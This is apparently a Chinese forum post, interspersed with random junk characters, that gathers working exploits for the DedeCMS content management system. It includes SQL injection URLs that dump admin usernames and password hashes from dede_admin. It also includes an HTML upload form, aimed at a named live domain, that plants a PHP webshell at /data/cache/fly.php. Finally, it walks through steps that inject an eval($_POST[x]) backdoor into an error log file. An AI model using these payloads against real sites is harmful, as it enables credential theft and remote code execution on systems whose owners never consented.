http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='4 N9 q0 w$ f: A. I% k2 R* n

- X; B5 M1 [5 b7 f! H% p. N& l* ~+ i
/ l! C7 l1 i2 G; A
  y/ D8 k5 o8 ~+ Q+ c  x# ?  Q% H1 L2 y! J! H* F
' G$ |' S) F; Y2 U2 M! k  d+ L
+ w: A! |* D1 s. w! {

, h; \+ D( a+ b7 O0 F# B: ~! s& t( W1 x

* a+ v: X+ L) g, _# W7 e; L  d2 Y% {" x7 L
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
, ?( O* l) g, R! v5 @' t: g<html>4 b& H3 r  ~  N9 ~# w6 _0 f
<head>/ v3 b4 G0 z. g
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
$ P, {6 V' e  N; Q, ^</head>3 v! W1 a: C7 U! x1 s4 I' X- h% S
<body style="FONT-SIZE: 9pt">
5 ]3 [" F0 B0 ^* P$ p---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
( x" u3 `  {0 f2 ^- O4 B9 E<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>8 ?8 {5 f& w8 E8 ]1 e9 s
<input type='hidden' name='activepath' value='/data/cache/' />
* d" `  `  Z# V% V/ p3 \<input type='hidden' name='cfg_basedir' value='../../' />
5 x3 e5 C3 r+ C- d/ q<input type='hidden' name='cfg_imgtype' value='php' />
1 a: k. A) m& r! X4 D- o<input type='hidden' name='cfg_not_allowall' value='txt' />
( x3 ?) h: A' h2 b% s<input type='hidden' name='cfg_softtype' value='php' />( z& P' s0 [+ \' r
<input type='hidden' name='cfg_mediatype' value='php' />
- g" G9 i, A3 K' Z<input type='hidden' name='f' value='form1.enclosure' />
' w  K8 {5 x& r5 f! w<input type='hidden' name='job' value='upload' />. Z, j4 \9 V/ B' Y, M  v: ]1 N: P
<input type='hidden' name='newname' value='fly.php' />
* C% m% A4 C! m" bSelect U Shell <input type='file' name='uploadfile' size='25' />
6 s: p( l" C$ W<input type='submit' name='sb1' value='确定' />* Z5 T/ H& {0 z0 h( I
</form>
& @- Z* K0 v+ Z7 S<br />It's just a exp for the bug of Dedecms V55...<br />
1 E2 L+ Y4 g+ oNeed register_globals = on...<br />
) Y4 p/ K1 j. h3 q1 a# K: fFun the game,get a webshell at /data/cache/fly.php...<br />9 p9 V8 O; T7 x0 K" J4 _
</body>
/ M# {/ l- {4 R# a</html>' C% R3 c- ^/ y& ]
0 y( Z* |7 ]+ b

! S/ l' o% W; q& K  ~6 M4 D: V$ f8 y, B- L! e$ f$ O

" e* C% w4 j! E& r5 D
/ W/ O7 C4 _1 B3 \3 G* i/ [7 }& W' \5 `8 V( J0 t: H; v! N4 S
% T' ~0 q6 c" \
/ l6 `7 ], E: E, K1 G9 u; n

8 D0 d3 c0 u4 Y+ X7 ~- Q; k4 S' [0 u* M4 g4 \( C3 Y  L
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞5 b4 }0 H2 a5 S3 n' y, Z
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。4 z8 \7 e' L' c
1. 访问网址:
! P, ~4 }/ s8 H# J! n" T5 j
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>8 n% a, d2 n. r5 a( |# N  U
可看见错误信息$ G0 T5 p+ m. i
; ?2 z5 I, S/ k  R8 B

  M6 ?9 t$ Z% o! ]( x. ]- [2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
! G4 p- w' ~# D) r( c2 fint(3) Error: Illegal double '1024e1024' value found during parsing
9 q) n6 y1 ~9 S: WError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
: l4 ^) |" _5 N- y4 n1 i4 f( T4 E7 q) ?& |  W
2 e. g7 U! X3 |1 |8 O4 P* I0 X2 A
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
- e0 b# ^8 }. U) i& V1 J9 k3 D6 L, Y7 D8 e' b; L
; s" S! u4 _+ t9 H$ d
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
5 G3 O/ L, R9 ?3 n2 }2 I9 ?) a+ ^6 t9 L( @5 z5 }

/ l. u; O( F0 S1 N" u- N按确定后的看到第2步骤的信息表示文件木马上传成功.$ [8 d7 }* B% g$ _- w

, a: z* ]7 ~4 H8 H- i
, s! @( f/ ?4 [9 A1 t+ L5 B2 x
4 M# D, e- a' i5 t
; J6 y) h. S/ z: i+ B; E. K
1 {, q& \5 V' U0 o4 H: J
7 K3 \' B7 e9 U+ n5 F3 L' Z; G
: A) d4 k- c% j% K' t) w- o
. B9 r9 [' Y$ P6 o3 t+ w* P! B. P; h5 s# s
! g; `; g) I8 F/ W& i
! c0 ?2 D  j. }4 s1 W+ B8 b
" {: K1 I: k6 S7 k2 T
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
) y' w0 V! G; O; Qhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表